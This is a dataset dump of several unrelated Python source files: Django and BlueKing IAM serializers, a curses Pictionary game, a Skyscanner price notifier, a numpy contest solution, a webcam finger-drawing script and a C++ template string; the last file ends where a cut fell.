content
stringlengths
0
894k
type
stringclasses
2 values
from django.contrib.auth import get_user_model from rest_framework import serializers from phonenumber_field.serializerfields import PhoneNumberField User = get_user_model() class PhoneNumberSerializer(serializers.Serializer): phone_number = PhoneNumberField(required=True) confirmation_code = serializers.IntegerField(read_only=True) class ConfirmationCodeSerializer(PhoneNumberSerializer): confirmation_code = serializers.IntegerField(required=True) class UserSerializer(serializers.ModelSerializer): invited_users = serializers.SerializerMethodField() class Meta: model = User fields = ('phone_number', 'invite_code', 'activated_code', 'invited_users') read_only_fields = ('phone_number', 'invite_code',) def validate(self, data): request = self.context.get('request') activated_code = request.data.get('activated_code') if not activated_code: return super().validate(data) if not User.objects.filter(invite_code=activated_code).exists(): raise serializers.ValidationError( 'User with this invite code does not exist.' ) if request.user.activated_code and activated_code: raise serializers.ValidationError( 'You have already activated an invite code.' ) return super().validate(data) def get_invited_users(self, obj): invite_code = obj.invite_code return User.objects.filter(activated_code=invite_code).values_list( 'phone_number' )
python
#!/usr/bin/env python3 import sys import csv import time import random import curses import signal import pickle import datetime import argparse import subprocess from enum import Enum from copy import deepcopy as copy State = Enum('State', 'pick watch getready draw countdown check roll') class GameTerminated(Exception): def __init__(self, saved=False): self.saved = saved class ScreenTooSmall(GameTerminated): pass class Team: def __init__(self, team_id, color=None): self.id = team_id self.color = color class Game: board_str = 'ybMgRYbmG*RYbmGyRB*mGyRMbgR*YBmgRbYMg*RyBMgyBmR' category_colors = [] team_colors = [] interrupted = False # all possible game strings text_header = u'Pyctionary, a word game for geeks. ESC to quit, \'<\' to undo' text_countdown = u'Time left (Ctrl-C to interrupt): ' text_timeout = u'Time is up!' text_dice = u'Roll the dice (1-6 or 0 to randomly advance): ' text_hide_card = u'Press ENTER to hide the card' text_getready = u'Get ready! Press ENTER to start drawing!' text_draw = u'Press ENTER to start drawing' text_success_or_fail = u'(S)uccess or (F)ail? ' text_pick_card = u'Press ENTER to pick a card' text_finish_line = u'Not going forward, finish line already reached' text_save_game = u'Save game? 
(Y/N) ' chr_active_marker = u'▶' text_all_play_marker = u'◀▶' fmt_moving = u'Moving forward of {} positions' # sand timer, in seconds timeout = 60 def __init__(self, stdscr, categories, cards, num_teams, restore_file): self.stdscr = stdscr self.categories = categories self.cards = cards self.num_teams = num_teams self.restore_file = restore_file self.states = [] self.teams = [] # randomize active team on startup self.active_team = random.randint(0, self.num_teams-1) self.positions = [] self.card_data = [] self.time_start = 0 self.all_play = False self.state = State.pick self.cell = self.board_str[0] # actual window size self.y = curses.LINES-1 self.x = curses.COLS-1 # subwindows self.header = None self.board = None self.card = None self.legend = None self.footer = None # setup self.interface_setup() self.team_setup() def team_setup(self): for i in range(self.num_teams): self.teams.append(Team(i, color=self.team_colors[i])) self.positions.append(0) def interface_setup(self): # hide the cursor curses.curs_set(False) # diable newline mode curses.nonl() # categories curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_YELLOW) curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_BLUE) curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_MAGENTA) curses.init_pair(4, curses.COLOR_BLACK, curses.COLOR_GREEN) curses.init_pair(5, curses.COLOR_BLACK, curses.COLOR_RED) # header and footer curses.init_pair(6, curses.COLOR_BLACK, curses.COLOR_CYAN) # teams curses.init_pair(7, curses.COLOR_BLUE, 0) curses.init_pair(8, curses.COLOR_MAGENTA, 0) curses.init_pair(9, curses.COLOR_GREEN, 0) curses.init_pair(10, curses.COLOR_YELLOW, 0) # board: any color curses.init_pair(11, curses.COLOR_WHITE, curses.COLOR_WHITE) # root background curses.init_pair(12, curses.COLOR_BLACK, curses.COLOR_WHITE) # define color sets self.category_colors = [ (u'yellow', curses.color_pair(1)), (u'blue', curses.color_pair(2)), (u'magenta', curses.color_pair(3)), (u'green', curses.color_pair(4)), (u'red', 
curses.color_pair(5))] self.team_colors = [ (u'blue', curses.color_pair(7)), (u'magenta', curses.color_pair(8)), (u'green', curses.color_pair(9)), (u'yellow', curses.color_pair(10))] # clear screen self.stdscr.clear() # change root background #self.stdscr.bkgd(u' ', curses.color_pair(12) | curses.A_BOLD) def draw_header(self): self.header = self.stdscr.subwin(1, self.x, 0, 0) self.header.bkgd(u' ', curses.color_pair(6) | curses.A_BOLD) self.header.addstr(0, 1, self.text_header, curses.color_pair(6)) def draw_board(self): # board self.board = self.stdscr.subwin(3 + self.num_teams, self.x, 1, 0) self.update_board() def update_board(self): for i, c in enumerate(self.board_str): chars = u' ' if c == '*': attr = curses.color_pair(11) else: if c in ['y', 'Y']: attr = curses.color_pair(1) elif c in ['b', 'B']: attr = curses.color_pair(2) elif c in ['m', 'M']: attr = curses.color_pair(3) elif c in ['g', 'G']: attr = curses.color_pair(4) else: attr = curses.color_pair(5) if c.isupper(): chars = self.text_all_play_marker # if (i+1) % 12 == 0: # chars = u'||' self.board.addstr(1, 10+2*i, chars, attr) # teams for team in self.teams: self.board.addstr(3+team.id, 10, (self.positions[team.id] + 1) * u' ', team.color[1] | curses.A_REVERSE) #self.board.addstr(3+team.id, 1, u' {}'.format(team.color[0]), team.color[1]) base_text = u'{:^7s}'.format(team.color[0]) args = team.color[1] if self.active_team == team.id: text = self.chr_active_marker + base_text args |= curses.A_REVERSE else: text = u' ' + base_text self.board.addstr(3+team.id, 1, text, args) def draw_card(self): tot_y = len(self.categories)*3+2 tot_x = 40 self.card = self.stdscr.subwin(tot_y, tot_x, 9+(self.y-tot_y-9-6)//2, (self.x-tot_x)//2) self.card.box() def update_card(self): for i, _ in enumerate(self.categories): self.card.addstr(1+i*3, 1, u' '*38, self.category_colors[i][1]) text = self.card_data[i] args = self.category_colors[i][1] if self.category_colors[i][0].startswith(self.cell.lower()): text = u'*** {} 
***'.format(text) self.card.addstr(2+i*3, 1, u'{:^38s}'.format(text), args) self.card.addstr(3+i*3, 1, u' '*38, self.category_colors[i][1]) def blank_card(self): for i, _ in enumerate(self.categories): self.card.addstr(1+i*3, 1, u' '*38) self.card.addstr(2+i*3, 1, u' '*38) self.card.addstr(3+i*3, 1, u' '*38) def draw_legend(self): padding = 0 self.legend = self.stdscr.subwin(3, self.x, self.y-3-3, 0) for i, cat in enumerate(self.categories): self.legend.addstr(1, 10+padding, u' {} '.format(cat), self.category_colors[i][1]) padding += len(cat)+3 def draw_footer(self): self.footer = self.stdscr.subwin(3, self.x, self.y-3, 0) self.footer.bkgd(u' ', curses.color_pair(6)) def draw_interface(self): self.draw_header() self.draw_board() self.draw_card() self.draw_legend() self.draw_footer() self.stdscr.refresh() def pick_card(self): idx = random.choice(range(len(self.cards))) self.card_data = self.cards[idx] del self.cards[idx] def update_countdown(self, elapsed): # dark (or red) stripe self.footer.addstr(1, 34, u' '*self.timeout, curses.color_pair(5) if 10 > (self.timeout - elapsed) else curses.A_REVERSE) # white stripe self.footer.addstr(1, 34 + (self.timeout - elapsed), u' '*elapsed, curses.color_pair(11)) def check_size(self): if not self._big_enough(): saved = False if self.states: self.save_game() saved = True raise ScreenTooSmall(saved) def _big_enough(self): self.y, self.x = self.stdscr.getmaxyx() if self.x < 104 or self.y < 32: return False return True def get_state(self): return [ self.active_team, copy(self.positions), copy(self.card_data), self.all_play, self.state, ] def load_state(self, active_team, positions, card_data, all_play, state): self.active_team = active_team self.positions = positions self.card_data = card_data self.all_play = all_play self.state = state def save_game(self): obj = { 'categories': self.categories, 'cards': self.cards, 'num_teams': self.num_teams, 'states': self.states, 'teams': self.teams, 'active_team': self.active_team, 
'positions': self.positions, 'card_data': self.card_data, 'time_start': self.time_start, 'all_play': self.all_play, 'state': self.state, 'cell': self.cell} with open(self.restore_file, 'wb') as f: pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL) def restore_game(self, fname=False): restore_file = fname if fname else self.restore_file with open(restore_file, 'rb') as f: game = pickle.load(f) self.categories = game['categories'] self.cards = game['cards'] self.num_teams = game['num_teams'] self.states = game['states'] self.teams = game['teams'] self.active_team = game['active_team'] self.positions = game['positions'] self.card_data = game['card_data'] self.time_start = game['time_start'] self.all_play = game['all_play'] self.state = game['state'] self.cell = game['cell'] def loop(self): self.state_prev = '' self.next_state = self.state self.all_play_prev = False key = 0 self.check_size() self.draw_interface() while True: # ESC to quit if key == 27: self.footer.clear() self.footer.addstr(1,1, self.text_save_game) self.footer.refresh() while True: key = self.footer.getch() if key in [ord(x) for x in 'yYnN']: break if chr(key).upper() == 'Y': self.save_game() raise GameTerminated(saved=True) else: raise GameTerminated(saved=False) # resize window elif key == curses.KEY_RESIZE: # clear the screen to avoid artifacts self.stdscr.erase() # update screen size if not self._big_enough(): self.stdscr.erase() self.stdscr.addstr(1, 1, u'Screen too small!') self.stdscr.refresh() key = self.stdscr.getch() continue else: self.draw_interface() elif key == ord('<'): if len(self.states) > 0: if self.state in [State.check, State.roll] \ or self.state == State.pick and len(self.states) > 1: del self.states[-1] self.load_state(*self.states[-1]) self.next_state = self.state self.stdscr.erase() self.draw_interface() self.stdscr.refresh() else: if self.state_prev != self.state \ and self.state in [State.pick, State.check, State.roll]: self.states.append(self.get_state()) if self.all_play: 
self.footer.bkgd(u' ', curses.color_pair(1)) else: self.footer.bkgd(u' ', curses.color_pair(6)) # game automaton if self.state == State.pick: # game self.cell = self.board_str[self.positions[self.active_team]] if key in [curses.KEY_ENTER, 10, 13]: self.pick_card() self.next_state = State.watch curses.ungetch(128) # interface self.blank_card() self.card.refresh() self.footer.clear() self.footer.addstr(1, 1, self.text_pick_card) self.footer.refresh() elif self.state == State.watch: # game if key in [curses.KEY_ENTER, 10, 13]: self.next_state = State.getready curses.ungetch(128) # interface (display card) self.update_card() self.card.refresh() self.footer.clear() self.footer.addstr(1, 1, self.text_hide_card) self.footer.refresh() elif self.state == State.getready: if key in [curses.KEY_ENTER, 10, 13]: self.next_state = State.draw curses.ungetch(128) # interface (blank card and add countdown text in the footer) self.blank_card() self.card.refresh() self.footer.clear() self.footer.addstr(1, 1, self.text_getready) self.footer.refresh() elif self.state == State.draw: # game self.time_start = time.time() Game.interrupted = False self.next_state = State.countdown curses.ungetch(128) elif self.state == State.countdown: # game elapsed = int(time.time() - self.time_start) if elapsed > self.timeout: self.next_state = State.check # interface try: subprocess.Popen(['aplay', 'data/alarm.wav'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) except: pass self.footer.clear() self.footer.addstr(1, 1, self.text_timeout) self.footer.refresh() curses.napms(3000) curses.ungetch(128) elif Game.interrupted: self.next_state = State.check curses.ungetch(128) # interface self.footer.clear() else: try: curses.ungetch(128) except: pass # interface self.footer.addstr(1, 1, self.text_countdown) self.update_countdown(elapsed) # interface self.footer.refresh() elif self.state == State.check: # interface self.update_card() self.card.refresh() self.footer.clear() # game if self.all_play: # interface 
text = u'Winning team ' self.footer.addstr(1, 1, text) needle = len(text) text = u', '.join(u'({}){}'.format(team.color[0][0].upper(), team.color[0][1:]) for team in self.teams) text += u', (N)one: ' self.footer.addstr(1, 1 + needle, text) team_str = u'bmgy' if key in [ord('N'), ord('n')]: self.active_team = (self.active_team + 1) % self.num_teams self.next_state = State.pick # all play lasts at most 1 round self.all_play = False curses.ungetch(128) # interface self.update_board() self.board.refresh() self.footer.addch(chr(key).upper()) self.footer.refresh() curses.napms(2000) elif key in [ord(x) for x in team_str + team_str.upper()]: for team in self.teams: if team.color[0][0].upper() == chr(key).upper(): self.active_team = team.id break self.next_state = State.roll # all play lasts at most 1 round self.all_play = False curses.ungetch(128) # interface self.footer.addch(chr(key).upper()) self.footer.refresh() curses.napms(2000) else: # interface self.footer.addstr(1, 1, self.text_success_or_fail) if key in [ord(x) for x in 'sSfF']: upper_key = chr(key).upper() if upper_key == 'S': self.next_state = State.roll else: self.active_team = (self.active_team + 1) % self.num_teams self.next_state = State.pick curses.ungetch(128) # interface self.update_board() self.board.refresh() self.footer.addch(upper_key) self.footer.refresh() curses.napms(2000) elif self.state == State.roll: # interface self.update_board() self.board.refresh() self.footer.clear() self.footer.addstr(1, 1, self.text_dice) # game if key in [ord(str(x)) for x in range(7)]: if chr(key) == '0': t = time.time() tout = random.randint(2,7) result = 1 while (time.time()-t) < tout: result = random.randint(1, 6) self.footer.addch(1, len(self.text_dice) + 1, str(result)) self.footer.refresh() curses.napms(100) else: result = int(chr(key)) self.footer.addch(1, len(self.text_dice) + 1, str(result)) self.footer.refresh() curses.napms(1000) new_position = min(self.positions[self.active_team] + result, 
len(self.board_str)-1) # interface self.footer.erase() if self.positions[self.active_team] != new_position: if self.board_str[new_position].isupper(): self.all_play = True # interface self.footer.addstr(1, 1, self.fmt_moving.format(new_position - self.positions[self.active_team])) # game self.positions[self.active_team] = new_position else: # interface self.footer.addstr(1, 1, self.text_finish_line) # game self.next_state = State.pick # interface self.footer.refresh() self.update_board() self.board.refresh() curses.ungetch(128) curses.napms(2000) if self.all_play: self.footer.addstr(1, self.x-10, u'ALL PLAY!') else: self.footer.addstr(1, self.x-10, u' '*9) key = self.footer.getch() self.state_prev = self.state self.state = self.next_state self.all_play_prev = self.all_play curses.napms(10) def load_cards(path): cards = [] try: with open(path) as f: cards = [card for card in csv.reader(f)] except: die(u'Unable to load the card file, aborting.\n') return cards def signal_handler(signal, frame): Game.interrupted = True def parse_arguments(): parser = argparse.ArgumentParser(description=u'Pyctionary, a word game for geeks') parser.add_argument('--teams', type=int, default=2, help='Number of teams (must be between 2-4, default is 2)') parser.add_argument('--cards', type=str, default='cards/it.csv', help='Path to a card file (must be in csv format, default to cards/it.csv)') parser.add_argument('--restore', type=str, help='Restore a previous game state') args = parser.parse_args() return args def die(msg): sys.stderr.write(msg) sys.stderr.flush() sys.exit(1) def start_game(stdscr, categories, cards, num_teams, restore, restore_file): game = Game(stdscr, categories, cards, num_teams, restore_file) if restore: game.restore_game(restore) signal.signal(signal.SIGINT, signal_handler) game.loop() def main(): args = parse_arguments() if args.teams > 4 or args.teams < 2: die(u'Number of teams must be between 2 and 4.\n') restore_file = '/tmp/pyctionary_{}.pickle'.format( 
datetime.datetime.now().strftime('%Y%m%d-%H%M%S')) cards = load_cards(args.cards) categories = cards[0] cards = cards[1:] try: curses.wrapper(start_game, categories, cards, args.teams, args.restore, restore_file) except ScreenTooSmall as e: if e.saved: sys.stderr.write(u'Game saved as {}\n'.format(restore_file)) die(u'Minimum term size 104x32, aborting.\n') except GameTerminated as e: if e.saved: sys.stderr.write(u'Game saved as {}\n'.format(restore_file)) except pickle.UnpicklingError: sys.stderr.write(u'Malformed restore file provided, aborting\n') if __name__ == '__main__': main()
python
text = """ //------------------------------------------------------------------------------ // Explicit instantiation. //------------------------------------------------------------------------------ #include "computeGenerators.cc" namespace Spheral { template void computeGenerators<Dim< %(ndim)s >, vector<NodeList<Dim< %(ndim)s > >*>::iterator, vector<Boundary<Dim< %(ndim)s > >*>::iterator> (vector<NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin, vector<NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd, vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryBegin, vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryEnd, const bool meshGhostNodes, const Dim< %(ndim)s >::Vector& xmin, const Dim< %(ndim)s >::Vector& xmax, vector<Dim< %(ndim)s >::Vector>& positions, vector<Dim< %(ndim)s >::SymTensor>& Hs, vector<unsigned>& offsets); template void computeGenerators<Dim< %(ndim)s >, vector<const NodeList<Dim< %(ndim)s > >*>::iterator, vector<Boundary<Dim< %(ndim)s > >*>::iterator> (vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin, vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd, vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryBegin, vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryEnd, const bool meshGhostNodes, const Dim< %(ndim)s >::Vector& xmin, const Dim< %(ndim)s >::Vector& xmax, vector<Dim< %(ndim)s >::Vector>& positions, vector<Dim< %(ndim)s >::SymTensor>& Hs, vector<unsigned>& offsets); template void computeGenerators<Dim< %(ndim)s >, vector<const NodeList<Dim< %(ndim)s > >*>::iterator, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator> (vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin, vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryBegin, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryEnd, const bool meshGhostNodes, const Dim< %(ndim)s >::Vector& xmin, const Dim< %(ndim)s >::Vector& xmax, vector<Dim< 
%(ndim)s >::Vector>& positions, vector<Dim< %(ndim)s >::SymTensor>& Hs, vector<unsigned>& offsets); template void computeGenerators<Dim< %(ndim)s >, vector<NodeList<Dim< %(ndim)s > >*>::const_iterator, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator> (vector<NodeList<Dim< %(ndim)s > >*>::const_iterator nodeListBegin, vector<NodeList<Dim< %(ndim)s > >*>::const_iterator nodeListEnd, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryBegin, vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryEnd, const bool meshGhostNodes, const Dim< %(ndim)s >::Vector& xmin, const Dim< %(ndim)s >::Vector& xmax, vector<Dim< %(ndim)s >::Vector>& positions, vector<Dim< %(ndim)s >::SymTensor>& Hs, vector<unsigned>& offsets); } """
python
import requests import json import datetime import pprint class FlightTicketPriceNotificationFromSkyscanner(): SkyscannerApiKey = "sk-----" MailgunApiKey = "key------" MailgunSandbox = "sandbox-----" MailgunEmail = "-----@-----" conditions = [{ "country": "PL", "currency": "PLN", "originplace": "WAW", "destinationplace": "SEL", "outbounddate": "2018-02-09", "inbounddate": "2018-02-24", "adults": "1", "children": "0", "infants": "0", "stops": "0", "notifyMinPrice": "2500", }] def start(self): for condition in self.conditions: parsedFlightTicketInfoData = self.parseFlightTicketInfoFromSkyscanner(condition) flightTicketInfoData = self.handlingFlightTicketInfo(condition,parsedFlightTicketInfoData) self.notifyThoughEmail(condition,flightTicketInfoData) pass def parseFlightTicketInfoFromSkyscanner(self, condition): skyscannerSessionUrl = "http://business.skyscanner.net/apiservices/pricing/v1.0/" payload = { "locale": "pl-PL", "locationSchema": "iata", "apikey": self.SkyscannerApiKey, "grouppricing": "on", "cabinclass": "Economy" } payload.update(condition) headers = { 'connection': "keep-alive", 'content-length': "245", 'content-type': "application/x-www-form-urlencoded", 'host': "business.skyscanner.net", 'origin': "http://business.skyscanner.net", 'user-agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", 'cache-control': "no-cache", } SessionResponse = requests.request('POST', skyscannerSessionUrl, data=payload, headers=headers) if isinstance(SessionResponse, str): return skyscannerPollingUrl = SessionResponse.headers['location'] querystring = {"apikey": self.SkyscannerApiKey} stops = condition.get("stops") if stops is not None: querystring.update({"stops": stops}) pollingResponse = json.loads(requests.request("GET", skyscannerPollingUrl, params=querystring).content) return pollingResponse def handlingFlightTicketInfo(self, condition, parsedFlightTicketInfoData): flightTicketInfoArray = [] itineraries = 
parsedFlightTicketInfoData.get("Itineraries",[]) legs = parsedFlightTicketInfoData.get("Legs",[]) carriers = parsedFlightTicketInfoData.get("Carriers",[]) agents = parsedFlightTicketInfoData.get("Agents",[]) places = parsedFlightTicketInfoData.get("Places",[]) for itinerary in itineraries: flightTicketInfo = {} flightTicketInfo['searchDate'] = datetime.datetime.utcnow().strftime("%Y-%m-%d") firstitemOutbound = itinerary['OutboundLegId'] firstitemInbound = itinerary['InboundLegId'] firstitemSeller = itinerary['PricingOptions'][0]['Agents'][0] flightTicketInfo["OutboundLegId"] = firstitemOutbound flightTicketInfo["InboundLegId"] = firstitemInbound flightTicketInfo["price"] = int(itinerary['PricingOptions'][0]['Price']) for agent in agents: if int(firstitemSeller) == int(agent["Id"]): flightTicketInfo['seller'] = agent["Name"] for leg in legs: if leg["Id"].find(firstitemOutbound) > -1: firstitemOriginStationNum = leg["OriginStation"] firstitemDestinationStationNum = leg["DestinationStation"] firstitemCarrier = leg["Carriers"][0] flightTicketInfo['outboundDepartTime']= leg['Departure'][11:][:-3] flightTicketInfo['outboundArriveTime'] = leg["Arrival"][11:][:-3] flightTicketInfo['stops'] = len(leg["Stops"]) for place in places: if int(place["Id"]) == int(firstitemOriginStationNum): flightTicketInfo['outboundAirportCode'] = place["Code"] if int(place["Id"]) == int(firstitemDestinationStationNum): flightTicketInfo['inboundAirportCode'] = place["Code"] for carrier in carriers: if int(carrier["Id"]) == int(firstitemCarrier): flightTicketInfo['outboundAirline'] = carrier["Name"] flightTicketInfo['outboundAirlinecode'] = carrier["Code"] flightTicketInfo['outboundAirlinecode'] += leg["FlightNumbers"][0]["FlightNumber"] if leg["Id"].find(firstitemInbound) > -1: flightTicketInfo['inboundDepartTime'] = leg['Departure'][11:][:-3] flightTicketInfo['inboundArriveTime'] = leg["Arrival"][11:][:-3] for carrier in carriers: if int(carrier["Id"]) == int(firstitemCarrier): 
flightTicketInfo['inboundAirline'] = carrier["Name"] flightTicketInfo['inboundAirlinecode'] = carrier["Code"][:6] flightTicketInfo['inboundAirlinecode'] += leg["FlightNumbers"][0]["FlightNumber"] flightTicketInfo.update(condition) flightTicketInfoArray.append(flightTicketInfo) pprint.pprint(flightTicketInfoArray) return flightTicketInfoArray def notifyThoughEmail(self, condition, flightTicketInfoArray): notifyMinPrice = condition.get("notifyMinPrice") notifyCheckArray = [] for flightTicketInfo in flightTicketInfoArray: price = flightTicketInfo.get("price") if price is None: continue if int(notifyMinPrice) > int(price): notifyCheckArray.append(flightTicketInfo) if len(notifyCheckArray) > 0: emailMsg = "congratulation! The ticket price is less then your minimum price filter. \n" emailMsg += json.dumps(notifyCheckArray, sort_keys=True, indent=4) requests.post( f"https://api.mailgun.net/v3/{self.MailgunSandbox}.mailgun.org/messages", auth=("api", self.MailgunApiKey), data={"from": f"Mailgun Sandbox <postmaster@{self.MailgunSandbox}.mailgun.org>", "to": self.MailgunEmail, "subject": "congratulation! The ticket price is less then your minimum price filter.", "text": json.dumps(notifyCheckArray, sort_keys=True, indent=4)}) return notifyCheckArray if __name__ == '__main__': FlightTicketPriceNotificationFromSkyscanner().start()
python
import sys import typing import numpy as np def solve( x: np.array, y: np.array, ) -> typing.NoReturn: n = x.size ord = np.argsort(x, kind='mergesort') x, y = x[ord], y[ord] mn = np.minimum.accumulate(y) mx = np.maximum.accumulate(y) def possible(d): j = np.searchsorted(x, x - d, 'right') - 1 j, v = j[j >= 0], y[j >= 0] return np.any( (np.abs(mx[j] - v) >= d) | (np.abs(mn[j] - v) >= d), ) def binary_search(): lo, hi = 0, 1 << 40 while hi - lo > 1: d = (lo + hi) // 2 if possible(d): lo = d else: hi = d return lo print(binary_search()) def main() -> typing.NoReturn: n = int(input()) x, y = np.array( sys.stdin.read().split(), dtype=np.int64, ).reshape(n, 2).T solve(x, y) main()
python
try: import sys from cv2 import cv2 import numpy as np import time import math import utils.hand_tracking as ht except ModuleNotFoundError: sys.path.append("../") finally: import utils.hand_tracking as ht def main(show_fps=False, video_src=0): # Capture the video stream Webcam cap = cv2.VideoCapture(video_src) cap.set(3, 1280) cap.set(4, 720) previous_time = 0 track = ht.HandTracking(min_detection_confidence=0.85, min_tracking_confidence=0.7) x_draw, y_draw = 0, 0 canvas = np.zeros((720, 1280, 3), np.uint8) # Infinite loop waiting for key 'q' to terminate while cv2.waitKey(1) != (ord('q') or ord('Q')): # # Read the frame success, img = cap.read() # # Flip input image horizontally flip_image = cv2.flip(img, 1) # Track and revert the image track.find_hand(flip_image) track.find_finger_tips( flip_image, finger_list=None, # Add Finger string list else None show_connected=True, show_landmarks=True, draw_tips=False, hand_id_list=[0] ) finger_up_dict = track.is_finger_up(flip_image, hand_id_list=[0], threshold=2) finger_list = finger_up_dict['0'] if len(finger_list): finger_sum = sum(finger_list) landmarks = finger_up_dict['lms'] # Index Up - Draw Mode if finger_sum == 1 and finger_list[1]: x, y = landmarks['0'][8][:2] cv2.circle(flip_image, (x, y), 15, (255, 0, 255), cv2.FILLED) if not x_draw and not y_draw: x_draw, y_draw = x, y cv2.line(canvas, (x_draw, y_draw), (x, y), (255, 0, 255), 15) x_draw, y_draw = x, y # All Fingers except thumb - Erase mode elif finger_sum == 4 and not finger_list[0]: x1, y1 = landmarks['0'][12][:2] cv2.circle(flip_image, (x1, y1), 50, (255, 255, 255), cv2.FILLED) cv2.circle(canvas, (x1, y1), 50, (0, 0, 0), cv2.FILLED) if not x_draw and not y_draw: x_draw, y_draw = x1, y1 cv2.line(canvas, (x1, y1), (x_draw, y_draw), (0, 0, 0), 50) x_draw, y_draw = x1, y1 # Yo - Clear All elif finger_sum == 3 and not finger_list[2] and not finger_list[3]: canvas = np.zeros((720, 1280, 3), np.uint8) # Move Mode else: x_draw, y_draw = 0, 0 # Calculate FPS if 
show_fps: current_time = time.time() fps = 1 / (current_time - previous_time) previous_time = current_time # Include FPS text in image cv2.putText(flip_image, "FPS: {}".format(int(fps)), (10, 70), # Position cv2.FONT_HERSHEY_PLAIN, 1, # Font size (0, 0, 255), 2 # Thickness ) # Show the resultant image img_gray = cv2.cvtColor(canvas, cv2.COLOR_BGR2GRAY) _, img_gray = cv2.threshold(img_gray, 50, 255, cv2.THRESH_BINARY_INV) img_gray = cv2.cvtColor(img_gray, cv2.COLOR_GRAY2BGR) flip_image = cv2.bitwise_and(flip_image, img_gray) flip_image = cv2.bitwise_or(flip_image, canvas) cv2.imshow("Output", flip_image) cap.release() cv2.destroyAllWindows() if __name__ == "__main__": main(show_fps=True)
python
# -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-权限中心(BlueKing-IAM) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import sys

import pytz
from django.conf import settings
from rest_framework import serializers

from backend.common.serializers import BaseAction
from backend.common.time import PERMANENT_SECONDS
from backend.service.constants import PolicyEnvConditionTypeEnum, PolicyEnvTypeEnum
from backend.util.uuid import gen_uuid


# NOTE: the misspelled name ("Filed" instead of "Field") is kept because other
# modules may import it; renaming would break the public interface.
class ValueFiled(serializers.Field):
    """Pass-through field accepting bool/int/str attribute values.

    Ints must fit in the platform word size so they survive the round trip
    to the backend service without overflow.
    """

    def to_representation(self, value):
        return value

    def to_internal_value(self, data):
        if not isinstance(data, (bool, int, str)):
            raise serializers.ValidationError("value only support (bool, int, float, str)")

        if isinstance(data, int) and (data > sys.maxsize or data < -sys.maxsize - 1):
            raise serializers.ValidationError(f"int value must be in range [{-sys.maxsize - 1}:{sys.maxsize}]")

        return data


class ResourceSLZ(serializers.Serializer):
    """A single resource-instance node in a topology path."""

    system_id = serializers.CharField(label="系统ID")
    type = serializers.CharField(label="资源类型")
    type_name = serializers.CharField(label="资源类型名称", allow_blank=True)
    id = serializers.CharField(label="资源实例ID")
    # trim_whitespace=False: instance names may legitimately carry leading/trailing spaces
    name = serializers.CharField(label="资源实例ID名称", allow_blank=True, trim_whitespace=False)


class InstanceSLZ(serializers.Serializer):
    """A topology selection: one or more paths of resource nodes."""

    type = serializers.CharField(label="资源类型")
    name = serializers.CharField(label="资源类型名称", allow_blank=True)
    path = serializers.ListField(
        label="层级链路",
        child=serializers.ListField(label="链路", child=ResourceSLZ(label="节点"), allow_empty=False),
        required=True,
        allow_empty=False,
    )


class ValueSLZ(serializers.Serializer):
    id = ValueFiled(label="属性VALUE")
    name = serializers.CharField(label="属性VALUE名称", allow_blank=True)


class AttributeSLZ(serializers.Serializer):
    id = serializers.CharField(label="属性KEY")
    name = serializers.CharField(label="属性KEY名称", allow_blank=True)
    values = serializers.ListField(label="属性VALUE", child=ValueSLZ(label="值"), allow_empty=False)


class ConditionSLZ(serializers.Serializer):
    """One policy condition: a mix of topology instances and attributes."""

    id = serializers.CharField(label="条件id", allow_blank=True)
    instances = serializers.ListField(label="拓扑选择", child=InstanceSLZ(label="拓扑实例"))
    attributes = serializers.ListField(label="属性选择", child=AttributeSLZ(label="属性"))

    def validate(self, data):
        # An empty condition (no instances AND no attributes) is meaningless.
        if not data["instances"] and not data["attributes"]:
            raise serializers.ValidationError({"instances": ["instance and attribute must not be both empty"]})

        # Auto-assign an id for newly created conditions.
        if not data["id"]:
            data["id"] = gen_uuid()

        return data


class ResourceTypeSLZ(serializers.Serializer):
    """A resource type together with its effective conditions."""

    system_id = serializers.CharField(label="资源类型系统ID")
    type = serializers.CharField(label="资源类型")
    condition = serializers.ListField(label="生效条件", child=ConditionSLZ(label="条件"))

    def validate(self, data):
        """
        Ensure the number of instances in the conditions does not exceed the configured limit.
        """
        # Only paths whose instance type matches this resource type count toward the limit.
        count = 0
        for c in data["condition"]:
            for i in c["instances"]:
                if i["type"] == data["type"]:
                    count += len(i["path"])

        if count > settings.SINGLE_POLICY_MAX_INSTANCES_LIMIT:
            raise serializers.ValidationError(
                {"condition": ["实例数量超过限制 {} 个".format(settings.SINGLE_POLICY_MAX_INSTANCES_LIMIT)]}
            )

        return data


class EnvConditionValueSLZ(serializers.Serializer):
    name = serializers.CharField(label="显示名称", required=False, allow_blank=True, default="")
    value = ValueFiled(label="环境属性值")


# for validate
class WeekdayEnvValueSLZ(EnvConditionValueSLZ):
    # 0-6 == Monday-Sunday
    value = serializers.IntegerField(label="环境属性值", max_value=6, min_value=0)


# for validate
